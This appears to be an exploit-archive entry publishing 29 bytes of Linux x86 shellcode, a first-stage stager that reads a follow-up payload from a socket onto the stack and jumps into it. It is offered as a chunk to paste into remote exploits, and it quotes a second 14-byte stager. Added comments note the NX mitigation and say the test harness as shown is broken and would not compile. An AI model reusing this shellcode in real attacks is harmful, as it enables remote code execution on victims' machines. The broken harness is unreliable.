linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes

ID 1337DAY-ID-7132
Type zdt
Reporter Charles Stevenson
Modified 2005-11-09T00:00:00


Exploit for linux/x86 platform in category shellcode

linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes

/* h3ll-core.c by Charles Stevenson <[email protected]> 
 * I made this as a chunk you can paste in to make modular remote
 * exploits.  I use it as a first stage payload when I desire to
 * follow up with a real large payload of goodness.  This actually
 * is a bit larger than necessary because of the error checking but
 * in some cases proves nice.  For a tiny version of the same theme
 * check out mcb's 14 byte (saving of 15 bytes for all you
 * mathematicians out there ;).  The only problem might be that his
 * reads from stdin and can only read 385 bytes less than mine.  So
 * If you like to go big on the shellcode use mine... otherwise here's
 * mcb's (or comment out the delimited lines below to shrink mine):
 * "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
 * I assume the file descriptor is in %esi.  Since that's where it
 * was on the last exploit I wrote.  Change the instruction to
 * the appropriate register from your fndsckcode or put an int in
 * there for an fd that's always the same.
 */
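/*
 * 29 bytes of raw linux/x86 machine code kept as a NUL-terminated string
 * (sizeof hellcode == 30).  Each trailing comment below is the author's
 * disassembly of the bytes on that line: the first 22 bytes issue
 * read(fd, %esp, 512) and jump into the buffer just filled, the last 7 are
 * the _exit(1) stub taken when read() returns 2 or less.  Because the
 * buffer is the current stack (push %esp / pop %ecx) and control is
 * transferred with jmp *%ecx, this only runs where the stack is executable;
 * with a non-executable stack (NX) the jump faults instead, which is the
 * mitigation to check for when assessing exposure.  The terminating ';'
 * was missing from the listing as published.
 */
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
//  uncomment the following line to raise SIGTRAP in gdb
// "\xcc"                    // int3
//  22 bytes:
//  if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb"                  // xor    %ebx,%ebx
"\xf7\xe3"                  // mul    %ebx
"\x42"                      // inc    %edx
"\xc1\xe2\x09"              // shl    $0x9,%edx
"\x31\xf3"                  // xor    %esi,%ebx // (optional assumes fd in esi)
"\x04\x03"                  // add    $0x3,%al
"\x54"                      // push   %esp
"\x59"                      // pop    %ecx
"\xcd\x80"                  // int    $0x80
"\x3c\x02"                  // cmp    $0x02,%al // (optional error check) 
"\x7e\x02"                  // jle    exit      // (optional exit clean) 
"\xff\xe1"                  // jmp    *%ecx
//  7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0"                  // xor    %eax,%eax
"\x40"                      // inc    %eax
"\x89\xc3"                  // mov    %eax,%ebx
"\xcd\x80";                 // int    $0x80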

/*
 * Test harness for the hellcode array above.
 * NOTE(review): as extracted this does not compile -- the braces around the
 * function body and the tail of the printf() argument list (whatever
 * supplied the %d value) appear to have been dropped.  The visible lines
 * only print a banner and return; nothing shown here invokes shell().
 */
int main(void)
  /* Reinterprets the data array as a function pointer.  A call through it
   * can only succeed where that memory is executable; on a build whose data
   * pages are non-executable (NX / W^X) it faults instead. */
  void (*shell)() = (void *)&hellcode;
  printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
  return 0;
